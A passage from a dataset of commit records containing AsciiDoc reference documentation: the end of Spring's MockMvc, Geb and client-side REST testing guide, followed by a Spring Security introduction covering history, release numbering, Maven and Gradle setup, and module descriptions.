well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebDriver` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-geb]]\n===== MockMvc and Geb\n\nIn the previous section, we saw how to use `MockMvc` with `WebDriver`. In this section,\nwe will use http:\/\/www.gebish.org\/[Geb] to make our tests even Groovy-er.\n\n\n[[spring-mvc-test-server-htmlunit-geb-why]]\n====== Why Geb and MockMvc?\n\nGeb is backed by WebDriver, so it offers many of the\n<<spring-mvc-test-server-htmlunit-webdriver-why,same benefits>> that we get from\nWebDriver. However, Geb makes things even easier by taking care of some of the\nboilerplate code for us.\n\n[[spring-mvc-test-server-htmlunit-geb-setup]]\n====== MockMvc and Geb Setup\n\nWe can easily initialize a Geb `Browser` with a Selenium `WebDriver` that uses `MockMvc`\nas follows.\n\n[source,groovy]\n----\ndef setup() {\n\tbrowser.driver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build()\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcHtmlUnitDriverBuilder`.\nFor more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-geb-usage]]\n====== MockMvc and Geb Usage\n\nNow we can use Geb as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following:\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,groovy]\n----\nwhen:\nform.summary = expectedSummary\nform.text = expectedMessage\nsubmit.click(ViewMessagePage)\n----\n\nAny unrecognized method calls or property accesses\/references that are not found will be\nforwarded to the current page object. This removes a lot of the boilerplate code we needed\nwhen using WebDriver directly.\n\nAs with direct WebDriver usage, this improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As mentioned previously, we can use the Page Object Pattern with HtmlUnit and\nWebDriver, but it is even easier with Geb. Let's take a look at our new Groovy-based\n`CreateMessagePage` implementation.\n\n[source,groovy]\n----\nclass CreateMessagePage extends Page {\n\tstatic url = 'messages\/form'\n\tstatic at = { assert title == 'Messages : Create'; true }\n\tstatic content = {\n\t\tsubmit { $('input[type=submit]') }\n\t\tform { $('form') }\n\t\terrors(required:false) { $('label.error, .alert-error')?.text() }\n\t}\n}\n----\n\nThe first thing you will notice is that our `CreateMessagePage` extends `Page`. We won't\ngo over the details of `Page`, but in summary it contains common functionality for all of\nour pages. The next thing you will notice is that we define a URL in which this page can\nbe found. This allows us to navigate to the page as follows.\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe also have an `at` closure that determines if we are at the specified page. It should return\n`true` if we are on the correct page. This is why we can assert that we are on the correct\npage as follows.\n\n[source,groovy]\n----\nthen:\nat CreateMessagePage\nerrors.contains('This field is required.')\n----\n\n[NOTE]\n====\nWe use an assertion in the closure, so that we can determine where things went wrong if\nwe were at the wrong page.\n====\n\nNext we create a `content` closure that specifies all the areas of interest within the page.\nWe can use a\nhttp:\/\/www.gebish.org\/manual\/current\/intro.html#the_jquery_ish_navigator_api[jQuery-ish Navigator API]\nto select the content we are interested in.\n\nFinally, we can verify that a new message was created successfully.\n\n[source,groovy]\n----\nthen:\nat ViewMessagePage\nsuccess == 'Successfully created a new message'\nid\ndate\nsummary == expectedSummary\nmessage == expectedMessage\n----\n\nFor further details on how to get the most out of Geb, consult\nhttp:\/\/www.gebish.org\/manual\/current\/[The Book of Geb] user's manual.\n\n\n[[spring-mvc-test-client]]\n==== Client-Side REST Tests\nClient-side tests can be used to test code that internally uses the `RestTemplate`.\nThe idea is to declare expected requests and to provide \"stub\" responses so that\nyou can focus on testing the code in isolation, i.e. without running a server.\nHere is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(requestTo(\"\/greeting\")).andRespond(withSuccess());\n\n\t\/\/ Test code that uses the above RestTemplate ...\n\n\tmockServer.verify();\n----\n\nIn the above example, `MockRestServiceServer`, the central class for client-side REST\ntests, configures the `RestTemplate` with a custom `ClientHttpRequestFactory` that\nasserts actual requests against expectations and returns \"stub\" responses. In this case\nwe expect a request to \"\/greeting\" and want to return a 200 response with\n\"text\/plain\" content. We could define as additional expected requests and stub responses as\nneeded. When expected requests and stub responses are defined, the `RestTemplate` can be\nused in client-side code as usual. At the end of testing `mockServer.verify()` can be\nused to verify that all expectations have been satisfied.\n\nBy default requests are expected in the order in which expectations were declared.\nYou can set the `ignoreExpectOrder` option when building the server in which case\nall expectations are checked (in order) to find a match for a given request. That\nmeans requests are allowed to come in any order. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tserver = MockRestServiceServer.bindTo(restTemplate).ignoreExpectOrder().build();\n----\n\nEven with unordered requests by default each request is allowed to execute once only.\nThe `expect` method provides an overloaded variant that accepts an `ExpectedCount`\nargument that specifies a count range, e.g. `once`, `manyTimes`, `max`, `min`,\n`between`, and so on. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(times(2), requestTo(\"\/foo\")).andRespond(withSuccess());\n\tmockServer.expect(times(3), requestTo(\"\/bar\")).andRespond(withSuccess());\n\n\t\/\/ ...\n\n\tmockServer.verify();\n----\n\nNote that when `ignoreExpectOrder` is not set (the default), and therefore requests\nare expected in order of declaration, then that order only applies to the first of\nany expected request. For example if \"\/foo\" is expected 2 times followed by \"\/bar\"\n3 times, then there should be a request to \"\/foo\" before there is a request to \"\/bar\"\nbut aside from that subsequent \"\/foo\" and \"\/bar\" requests can come at any time.\n\nAs an alternative to all of the above the client-side test support also provides a\n`ClientHttpRequestFactory` implementation that can be configured into a `RestTemplate`\nto bind it to a `MockMvc` instance. That allows processing requests using actual\nserver-side logic but without running a server. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMockMvc mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\tthis.restTemplate = new RestTemplate(new MockMvcClientHttpRequestFactory(mockMvc));\n\n\t\/\/ Test code that uses the above RestTemplate ...\n\n\tmockServer.verify();\n----\n\n\n\n[[spring-mvc-test-client-static-imports]]\n===== Static Imports\nJust like with server-side tests, the fluent API for client-side tests requires a few\nstatic imports. Those are easy to find by searching __\"MockRest*\"__. Eclipse users\nshould add `\"MockRestRequestMatchers.{asterisk}\"` and `\"MockRestResponseCreators.{asterisk}\"`\nas \"favorite static members\" in the Eclipse preferences under\n__Java -> Editor -> Content Assist -> Favorites__.\nThat allows using content assist after typing the first character of the\nstatic method name. Other IDEs (e.g. IntelliJ) may not require any additional\nconfiguration. Just check the support for code completion on static members.\n\n[[spring-mvc-test-client-resources]]\n===== Further Examples of Client-side REST Tests\nSpring MVC Test's own tests include\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/client\/samples[example\ntests] of client-side REST tests.\n\n\n\n[[testing-examples-petclinic]]\n=== PetClinic Example\n\nThe PetClinic application, available on\nhttps:\/\/github.com\/spring-projects\/spring-petclinic[GitHub], illustrates several features\nof the __Spring TestContext Framework__ in a JUnit environment. Most test functionality\nis included in the `AbstractClinicTests`, for which a partial listing is shown below:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport static org.junit.Assert.assertEquals;\n\t\/\/ import ...\n\n\t**@ContextConfiguration**\n\tpublic abstract class AbstractClinicTests **extends AbstractTransactionalJUnit4SpringContextTests** {\n\n\t\t**@Autowired**\n\t\tprotected Clinic clinic;\n\n\t\t@Test\n\t\tpublic void getVets() {\n\t\t\tCollection<Vet> vets = this.clinic.getVets();\n\t\t\tassertEquals(\"JDBC query must show the same number of vets\",\n\t\t\t\t**super.countRowsInTable(\"VETS\")**, vets.size());\n\t\t\tVet v1 = EntityUtils.getById(vets, Vet.class, 2);\n\t\t\tassertEquals(\"Leary\", v1.getLastName());\n\t\t\tassertEquals(1, v1.getNrOfSpecialties());\n\t\t\tassertEquals(\"radiology\", (v1.getSpecialties().get(0)).getName());\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nNotes:\n\n* This test case extends the `AbstractTransactionalJUnit4SpringContextTests` class, from\n which it inherits configuration for Dependency Injection (through the\n `DependencyInjectionTestExecutionListener`) and transactional behavior (through the\n `TransactionalTestExecutionListener`).\n* The `clinic` instance variable -- the application object being tested -- is set by\n Dependency Injection through `@Autowired` semantics.\n* The `getVets()` method illustrates how you can use the inherited `countRowsInTable()`\n method to easily verify the number of rows in a given table, thus verifying correct\n behavior of the application code being tested. This allows for stronger tests and\n lessens dependency on the exact test data. For example, you can add additional rows in\n the database without breaking tests.\n* Like many integration tests that use a database, most of the tests in\n `AbstractClinicTests` depend on a minimum amount of data already in the database before\n the test cases run. Alternatively, you might choose to populate the database within the\n test fixture set up of your test cases -- again, within the same transaction as the\n tests.\n\nThe PetClinic application supports three data access technologies: JDBC, Hibernate, and\nJPA. By declaring `@ContextConfiguration` without any specific resource locations, the\n`AbstractClinicTests` class will have its application context loaded from the default\nlocation, `AbstractClinicTests-context.xml`, which declares a common `DataSource`.\nSubclasses specify additional context locations that must declare a\n`PlatformTransactionManager` and a concrete implementation of `Clinic`.\n\nFor example, the Hibernate implementation of the PetClinic tests contains the following\nimplementation. For this example, `HibernateClinicTests` does not contain a single line\nof code: we only need to declare `@ContextConfiguration`, and the tests are inherited\nfrom `AbstractClinicTests`. Because `@ContextConfiguration` is declared without any\nspecific resource locations, the __Spring TestContext Framework__ loads an application\ncontext from all the beans defined in `AbstractClinicTests-context.xml` (i.e., the\ninherited locations) and `HibernateClinicTests-context.xml`, with\n`HibernateClinicTests-context.xml` possibly overriding beans defined in\n`AbstractClinicTests-context.xml`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**\n\tpublic class HibernateClinicTests extends AbstractClinicTests { }\n----\n\nIn a large-scale application, the Spring configuration is often split across multiple\nfiles. Consequently, configuration locations are typically specified in a common base\nclass for all application-specific integration tests. Such a base class may also add\nuseful instance variables -- populated by Dependency Injection, naturally -- such as a\n`SessionFactory` in the case of an application using Hibernate.\n\nAs far as possible, you should have exactly the same Spring configuration files in your\nintegration tests as in the deployed environment. One likely point of difference\nconcerns database connection pooling and transaction infrastructure. If you are\ndeploying to a full-blown application server, you will probably use its connection pool\n(available through JNDI) and JTA implementation. Thus in production you will use a\n`JndiObjectFactoryBean` or `<jee:jndi-lookup>` for the `DataSource` and\n`JtaTransactionManager`. JNDI and JTA will not be available in out-of-container\nintegration tests, so you should use a combination like the Commons DBCP\n`BasicDataSource` and `DataSourceTransactionManager` or `HibernateTransactionManager`\nfor them. You can factor out this variant behavior into a single XML file, having the\nchoice between application server and a 'local' configuration separated from all other\nconfiguration, which will not vary between the test and production environments. In\naddition, it is advisable to use properties files for connection settings. See the\nPetClinic application for an example.\n\n\n\n\n[[testing-resources]]\n== Further Resources\nConsult the following resources for more information about testing:\n\n* http:\/\/www.junit.org\/[JUnit]: \"__A programmer-oriented testing framework for Java__\".\n Used by the Spring Framework in its test suite.\n* http:\/\/testng.org\/[TestNG]: A testing framework inspired by JUnit with added support\n for annotations, test groups, data-driven testing, distributed testing, etc.\n* http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ]: \"__Fluent assertions for Java__\"\n including support for Java 8 lambdas, streams, etc.\n* http:\/\/en.wikipedia.org\/wiki\/Mock_Object[Mock Objects]: Article in Wikipedia.\n* http:\/\/www.mockobjects.com\/[MockObjects.com]: Web site dedicated to mock objects, a\n technique for improving the design of code within test-driven development.\n* http:\/\/mockito.org\/[Mockito]: Java mock library based on the\n http:\/\/xunitpatterns.com\/Test%20Spy.html[test spy] pattern.\n* http:\/\/www.easymock.org\/[EasyMock]: Java library \"__that provides Mock Objects for\n interfaces (and objects through the class extension) by generating them on the fly\n using Java's proxy mechanism.__\" Used by the Spring Framework in its test suite.\n* http:\/\/www.jmock.org\/[JMock]: Library that supports test-driven development of Java\n code with mock objects.\n* http:\/\/dbunit.sourceforge.net\/[DbUnit]: JUnit extension (also usable with Ant and\n Maven) targeted for database-driven projects that, among other things, puts your\n database into a known state between test runs.\n* http:\/\/grinder.sourceforge.net\/[The Grinder]: Java load testing framework.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f04d8d8937cf92bc616cc4d00cba100a15726f4","subject":"Polish Reference Documentation","message":"Polish Reference Documentation\n\n- Improve emphasis\n- Fix formatting\n- Update to Spring Framework 5\n- Bom -> BOM\n\nFixes: gh-5695\n","repos":"spring-projects\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,fhanik\/spring-security,djechelon\/spring-security,djechelon\/spring-security,rwinch\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,fhanik\/spring-security,rwinch\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,djechelon\/spring-security,djechelon\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/preface\/introduction.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/preface\/introduction.adoc","new_contents":"\n\n[[introduction]]\n== Introduction\n\n\n[[what-is-acegi-security]]\n=== What is Spring Security?\nSpring Security provides comprehensive security services for Java EE-based enterprise software applications.\nThere is a particular emphasis on supporting projects built using The Spring Framework, which is the leading Java EE solution for enterprise software development.\nIf you're not using Spring for developing enterprise applications, we warmly encourage you to take a closer look at it.\nSome familiarity with Spring - and in particular dependency injection principles - will help you get up to speed with Spring Security more easily.\n\nPeople use Spring Security for many reasons, but most are drawn to the project after finding the security features of Java EE's Servlet Specification or EJB Specification lack the depth required for typical enterprise application scenarios.\nWhilst mentioning these standards, it's important to recognise that they are not portable at a WAR or EAR level.\nTherefore, if you switch server environments, it is typically a lot of work to reconfigure your application's security in the new target environment.\nUsing Spring Security overcomes these problems, and also brings you dozens of other useful, customisable security features.\n\nAs you probably know two major areas of application security are _authentication_ and _authorization_ (or _access-control_).\nThese are the two main areas that Spring Security targets.\n\"Authentication\" is the process of establishing a principal is who they claim to be (a \"principal\" generally means a user, device or some other system which can perform an action in your application).\n\"Authorization\" refers to the process of deciding whether a principal is allowed to perform an action within your application.\nTo arrive at the point where an authorization decision is needed, the identity of the principal has already been established by the authentication process.\nThese concepts are common, and not at all specific to Spring Security.\n\nAt an authentication level, Spring Security supports a wide range of authentication models.\nMost of these authentication models are either provided by third parties, or are developed by relevant standards bodies such as the Internet Engineering Task Force.\nIn addition, Spring Security provides its own set of authentication features.\nSpecifically, Spring Security currently supports authentication integration with all of these technologies:\n\n\n* HTTP BASIC authentication headers (an IETF RFC-based standard)\n\n* HTTP Digest authentication headers (an IETF RFC-based standard)\n\n* HTTP X.509 client certificate exchange (an IETF RFC-based standard)\n\n* LDAP (a very common approach to cross-platform authentication needs, especially in large environments)\n\n* Form-based authentication (for simple user interface needs)\n\n* OpenID authentication\n\n* Authentication based on pre-established request headers (such as Computer Associates Siteminder)\n\n* Jasig Central Authentication Service (otherwise known as CAS, which is a popular open source single sign-on system)\n\n* Transparent authentication context propagation for Remote Method Invocation (RMI) and HttpInvoker (a Spring remoting protocol)\n\n* Automatic \"remember-me\" authentication (so you can tick a box to avoid re-authentication for a predetermined period of time)\n\n* Anonymous authentication (allowing every unauthenticated call to automatically assume a particular security identity)\n\n* Run-as authentication (which is useful if one call should proceed with a different security identity)\n\n* Java Authentication and Authorization Service (JAAS)\n\n* Java EE container authentication (so you can still use Container Managed Authentication if desired)\n\n* Kerberos\n\n* Java Open Source Single Sign-On (JOSSO) *\n\n* OpenNMS Network Management Platform *\n\n* AppFuse *\n\n* AndroMDA *\n\n* Mule ESB *\n\n* Direct Web Request (DWR) *\n\n* Grails *\n\n* Tapestry *\n\n* JTrac *\n\n* Jasypt *\n\n* Roller *\n\n* Elastic Path *\n\n* Atlassian Crowd *\n\n* Your own authentication systems (see below)\n\n\n\n(* Denotes provided by a third party)\n\nMany independent software vendors (ISVs) adopt Spring Security because of this significant choice of flexible authentication models.\nDoing so allows them to quickly integrate their solutions with whatever their end clients need, without undertaking a lot of engineering or requiring the client to change their environment.\nIf none of the above authentication mechanisms suit your needs, Spring Security is an open platform and it is quite simple to write your own authentication mechanism.\nMany corporate users of Spring Security need to integrate with \"legacy\" systems that don't follow any particular security standards, and Spring Security is happy to \"play nicely\" with such systems.\n\nIrrespective of the authentication mechanism, Spring Security provides a deep set of authorization capabilities.\nThere are three main areas of interest: authorizing web requests, authorizing whether methods can be invoked and authorizing access to individual domain object instances.\nTo help you understand the differences, consider the authorization capabilities found in the Servlet Specification web pattern security, EJB Container Managed Security and file system security respectively.\nSpring Security provides deep capabilities in all of these important areas, which we'll explore later in this reference guide.\n\n\n[[history]]\n=== History\nSpring Security began in late 2003 as \"The Acegi Security System for Spring\".\nA question was posed on the Spring Developers' mailing list asking whether there had been any consideration given to a Spring-based security implementation.\nAt the time the Spring community was relatively small (especially compared with the size today!), and indeed Spring itself had only existed as a SourceForge project from early 2003.\nThe response to the question was that it was a worthwhile area, although a lack of time currently prevented its exploration.\n\nWith that in mind, a simple security implementation was built and not released.\nA few weeks later another member of the Spring community inquired about security, and at the time this code was offered to them.\nSeveral other requests followed, and by January 2004 around twenty people were using the code.\nThese pioneering users were joined by others who suggested a SourceForge project was in order, which was duly established in March 2004.\n\nIn those early days, the project didn't have any of its own authentication modules.\nContainer Managed Security was relied upon for the authentication process, with Acegi Security instead focusing on authorization.\nThis was suitable at first, but as more and more users requested additional container support, the fundamental limitation of container-specific authentication realm interfaces became clear.\nThere was also a related issue of adding new JARs to the container's classpath, which was a common source of end user confusion and misconfiguration.\n\nAcegi Security-specific authentication services were subsequently introduced.\nAround a year later, Acegi Security became an official Spring Framework subproject.\nThe 1.0.0 final release was published in May 2006 - after more than two and a half years of active use in numerous production software projects and many hundreds of improvements and community contributions.\n\nAcegi Security became an official Spring Portfolio project towards the end of 2007 and was rebranded as _Spring Security_.\n\nToday Spring Security enjoys a strong and active open source community.\nThere are thousands of messages about Spring Security on the support forums.\nThere is an active core of developers who work on the code itself and an active community which also regularly share patches and support their peers.\n\n\n[[release-numbering]]\n=== Release Numbering\nIt is useful to understand how Spring Security release numbers work, as it will help you identify the effort (or lack thereof) involved in migrating to future releases of the project.\nEach release uses a standard triplet of integers: MAJOR.MINOR.PATCH.\nThe intent is that MAJOR versions are incompatible, large-scale upgrades of the API.\nMINOR versions should largely retain source and binary compatibility with older minor versions, thought there may be some design changes and incompatible updates.\nPATCH level should be perfectly compatible, forwards and backwards, with the possible exception of changes which are to fix bugs and defects.\n\nThe extent to which you are affected by changes will depend on how tightly integrated your code is.\nIf you are doing a lot of customization you are more likely to be affected than if you are using a simple namespace configuration.\n\nYou should always test your application thoroughly before rolling out a new version.\n\n\n[[get-spring-security]]\n=== Getting Spring Security\nYou can get hold of Spring Security in several ways.\nYou can download a packaged distribution from the main http:\/\/spring.\nio\/spring-security[Spring Security] page, download individual jars from the Maven Central repository (or a Spring Maven repository for snapshot and milestone releases) or, alternatively, you can build the project from source yourself.\n\n[[maven]]\n==== Usage with Maven\n\nA minimal Spring Security Maven set of dependencies typically looks like the following:\n\n.pom.xml\n[source,xml]\n[subs=\"verbatim,attributes\"]\n----\n<dependencies>\n<!-- ... other dependency elements ... -->\n<dependency>\n\t<groupId>org.springframework.security<\/groupId>\n\t<artifactId>spring-security-web<\/artifactId>\n\t<version>{spring-security-version}<\/version>\n<\/dependency>\n<dependency>\n\t<groupId>org.springframework.security<\/groupId>\n\t<artifactId>spring-security-config<\/artifactId>\n\t<version>{spring-security-version}<\/version>\n<\/dependency>\n<\/dependencies>\n----\n\nIf you are using additional features like LDAP, OpenID, etc. you will need to also include the appropriate <<modules>>.\n\n[[maven-repositories]]\n===== Maven Repositories\nAll GA releases (i.e. versions ending in .RELEASE) are deployed to Maven Central, so no additional Maven repositories need to be declared in your pom.\n\nIf you are using a SNAPSHOT version, you will need to ensure you have the Spring Snapshot repository defined as shown below:\n\n.pom.xml\n[source,xml]\n----\n<repositories>\n<!-- ... possibly other repository elements ... -->\n<repository>\n\t<id>spring-snapshot<\/id>\n\t<name>Spring Snapshot Repository<\/name>\n\t<url>http:\/\/repo.spring.io\/snapshot<\/url>\n<\/repository>\n<\/repositories>\n----\n\nIf you are using a milestone or release candidate version, you will need to ensure you have the Spring Milestone repository defined as shown below:\n\n.pom.xml\n[source,xml]\n----\n<repositories>\n<!-- ... possibly other repository elements ... -->\n<repository>\n\t<id>spring-milestone<\/id>\n\t<name>Spring Milestone Repository<\/name>\n\t<url>http:\/\/repo.spring.io\/milestone<\/url>\n<\/repository>\n<\/repositories>\n----\n\n[[maven-bom]]\n===== Spring Framework BOM\n\nSpring Security builds against Spring Framework {spring-version}, but should work with 5\nThe problem that many users will have is that Spring Security's transitive dependencies resolve Spring Framework {spring-version} which can cause strange classpath problems.\n\nOne (tedious) way to circumvent this issue would be to include all the Spring Framework modules in a http:\/\/maven.apache.org\/guides\/introduction\/introduction-to-dependency-mechanism.html#Dependency_Management[<dependencyManagement>] section of your pom.\nAn alternative approach is to include the `spring-framework-bom` within your `<dependencyManagement>` section of your `pom.xml` as shown below:\n\n.pom.xml\n[source,xml]\n[subs=\"verbatim,attributes\"]\n----\n<dependencyManagement>\n\t<dependencies>\n\t<dependency>\n\t\t<groupId>org.springframework<\/groupId>\n\t\t<artifactId>spring-framework-bom<\/artifactId>\n\t\t<version>{spring-version}<\/version>\n\t\t<type>pom<\/type>\n\t\t<scope>import<\/scope>\n\t<\/dependency>\n\t<\/dependencies>\n<\/dependencyManagement>\n----\n\nThis will ensure that all the transitive dependencies of Spring Security use the Spring {spring-version} modules.\n\nNOTE: This approach uses Maven's \"bill of materials\" (BOM) concept and is only available in Maven 2.0.9+.\nFor additional details about how dependencies are resolved refer to http:\/\/maven.apache.org\/guides\/introduction\/introduction-to-dependency-mechanism.html[Maven's Introduction to the Dependency Mechanism documentation].\n\n[[gradle]]\n==== Gradle\nA minimal Spring Security Gradle set of dependencies typically looks like the following:\n\n.build.gradle\n[source,groovy]\n[subs=\"verbatim,attributes\"]\n----\ndependencies {\n\tcompile 'org.springframework.security:spring-security-web:{spring-security-version}'\n\tcompile 'org.springframework.security:spring-security-config:{spring-security-version}'\n}\n----\n\nIf you are using additional features like LDAP, OpenID, etc. you will need to also include the appropriate <<modules>>.\n\n[[gradle-repositories]]\n===== Gradle Repositories\nAll GA releases (i.e. versions ending in .RELEASE) are deployed to Maven Central, so using the mavenCentral() repository is sufficient for GA releases.\n\n.build.gradle\n[source,groovy]\n----\nrepositories {\n\tmavenCentral()\n}\n----\n\nIf you are using a SNAPSHOT version, you will need to ensure you have the Spring Snapshot repository defined as shown below:\n\n.build.gradle\n[source,groovy]\n----\nrepositories {\n\tmaven { url 'https:\/\/repo.spring.io\/snapshot' }\n}\n----\n\nIf you are using a milestone or release candidate version, you will need to ensure you have the Spring Milestone repository defined as shown below:\n\n.build.gradle\n[source,groovy]\n----\nrepositories {\n\tmaven { url 'https:\/\/repo.spring.io\/milestone' }\n}\n----\n\n[[gradle-resolutionStrategy]]\n===== Using Spring 4.0.x and Gradle\n\nBy default Gradle will use the newest version when resolving transitive versions.\nThis means that often times no additional work is necessary when running Spring Security {spring-security-version} with Spring Framework {spring-version}.\nHowever, at times there can be issues that come up so it is best to mitigate this using http:\/\/www.gradle.org\/docs\/current\/dsl\/org.gradle.api.artifacts.ResolutionStrategy.html[Gradle's ResolutionStrategy] as shown below:\n\n.build.gradle\n[source,groovy]\n[subs=\"verbatim,attributes\"]\n----\nconfigurations.all {\n\tresolutionStrategy.eachDependency { DependencyResolveDetails details ->\n\t\tif (details.requested.group == 'org.springframework') {\n\t\t\tdetails.useVersion '{spring-version}'\n\t\t}\n\t}\n}\n----\n\nThis will ensure that all the transitive dependencies of Spring Security use the Spring {spring-version} modules.\n\nNOTE: This example uses Gradle 1.9, but may need modifications to work in future versions of Gradle since this is an incubating feature within Gradle.\n\n[[modules]]\n==== Project Modules\nIn Spring Security 3.0, the codebase has been sub-divided into separate jars which more clearly separate different functionality areas and third-party dependencies.\nIf you are using Maven to build your project, then these are the modules you will add to your `pom.xml`.\nEven if you're not using Maven, we'd recommend that you consult the `pom.xml` files to get an idea of third-party dependencies and versions.\nAlternatively, a good idea is to examine the libraries that are included in the sample applications.\n\n\n[[spring-security-core]]\n===== Core - spring-security-core.jar\nContains core authentication and access-contol classes and interfaces, remoting support and basic provisioning APIs.\nRequired by any application which uses Spring Security.\nSupports standalone applications, remote clients, method (service layer) security and JDBC user provisioning.\nContains the top-level packages:\n\n* `org.springframework.security.core`\n\n* `org.springframework.security.access`\n\n* `org.springframework.security.authentication`\n\n* `org.springframework.security.provisioning`\n\n\n\n\n\n[[spring-security-remoting]]\n===== Remoting - spring-security-remoting.jar\nProvides intergration with Spring Remoting.\nYou don't need this unless you are writing a remote client which uses Spring Remoting.\nThe main package is `org.springframework.security.remoting`.\n\n\n[[spring-security-web]]\n===== Web - spring-security-web.jar\nContains filters and related web-security infrastructure code.\nAnything with a servlet API dependency.\nYou'll need it if you require Spring Security web authentication services and URL-based access-control.\nThe main package is `org.springframework.security.web`.\n\n\n[[spring-security-config]]\n===== Config - spring-security-config.jar\nContains the security namespace parsing code & Java configuration code.\nYou need it if you are using the Spring Security XML namespace for configuration or Spring Security's Java Configuration support.\nThe main package is `org.springframework.security.config`.\nNone of the classes are intended for direct use in an application.\n\n\n[[spring-security-ldap]]\n===== LDAP - spring-security-ldap.jar\nLDAP authentication and provisioning code.\nRequired if you need to use LDAP authentication or manage LDAP user entries.\nThe top-level package is `org.springframework.security.ldap`.\n\n\n[[spring-security-oauth2-core]]\n===== OAuth 2.0 Core - spring-security-oauth2-core.jar\n`spring-security-oauth2-core.jar` contains core classes and interfaces that provide support for the _OAuth 2.0 Authorization Framework_ and for _OpenID Connect Core 1.0_.\nIt is required by applications that use _OAuth 2.0_ or _OpenID Connect Core 1.0_, such as Client, Resource Server, and Authorization Server.\nThe top-level package is `org.springframework.security.oauth2.core`.\n\n\n[[spring-security-oauth2-client]]\n===== OAuth 2.0 Client - spring-security-oauth2-client.jar\n`spring-security-oauth2-client.jar` is Spring Security's client support for _OAuth 2.0 Authorization Framework_ and _OpenID Connect Core 1.0_.\nRequired by applications leveraging *OAuth 2.0 Login* and\/or OAuth Client support.\nThe top-level package is `org.springframework.security.oauth2.client`.\n\n\n[[spring-security-oauth2-jose]]\n===== OAuth 2.0 JOSE - spring-security-oauth2-jose.jar\n`spring-security-oauth2-jose.jar` contains Spring Security's support for the _JOSE_ (Javascript Object Signing and Encryption) framework.\nThe _JOSE_ framework is intended to provide a method to securely transfer claims between parties.\nIt is built from a collection of specifications:\n\n* JSON Web Token (JWT)\n* JSON Web Signature (JWS)\n* JSON Web Encryption (JWE)\n* JSON Web Key (JWK)\n\nIt contains the top-level packages:\n\n* `org.springframework.security.oauth2.jwt`\n* `org.springframework.security.oauth2.jose`\n\n\n[[spring-security-acl]]\n===== ACL - spring-security-acl.jar\nSpecialized domain object ACL implementation.\nUsed to apply security to specific domain object instances within your application.\nThe top-level package is `org.springframework.security.acls`.\n\n\n[[spring-security-cas]]\n===== CAS - spring-security-cas.jar\nSpring Security's CAS client integration.\nIf you want to use Spring Security web authentication with a CAS single sign-on server.\nThe top-level package is `org.springframework.security.cas`.\n\n\n[[spring-security-openid]]\n===== OpenID - spring-security-openid.jar\nOpenID web authentication support.\nUsed to authenticate users against an external OpenID server.\n`org.springframework.security.openid`.\nRequires OpenID4Java.\n\n\n[[spring-security-test]]\n===== Test - spring-security-test.jar\nSupport for testing with Spring Security.\n\n\n[[get-source]]\n==== Checking out the Source\nSince Spring Security is an Open Source project, we'd strongly encourage you to check out the source code using git.\nThis will give you full access to all the sample applications and you can build the most up to date version of the project easily.\nHaving the source for a project is also a huge help in debugging.\nException stack traces are no longer obscure black-box issues but you can get straight to the line that's causing the problem and work out what's happening.\nThe source is the ultimate documentation for a project and often the simplest place to find out how something actually works.\n\nTo obtain the source for the project, use the following git command:\n\n[source,txt]\n----\ngit clone https:\/\/github.com\/spring-projects\/spring-security.git\n----\n\nThis will give you access to the entire project history (including all releases and branches) on your local machine.\n","old_contents":"\n\n[[introduction]]\n== Introduction\n\n\n[[what-is-acegi-security]]\n=== What is Spring Security?\nSpring Security provides comprehensive security services for Java EE-based enterprise software applications.\nThere is a particular emphasis on supporting projects built using The Spring Framework, which is the leading Java EE solution for enterprise software development.\nIf 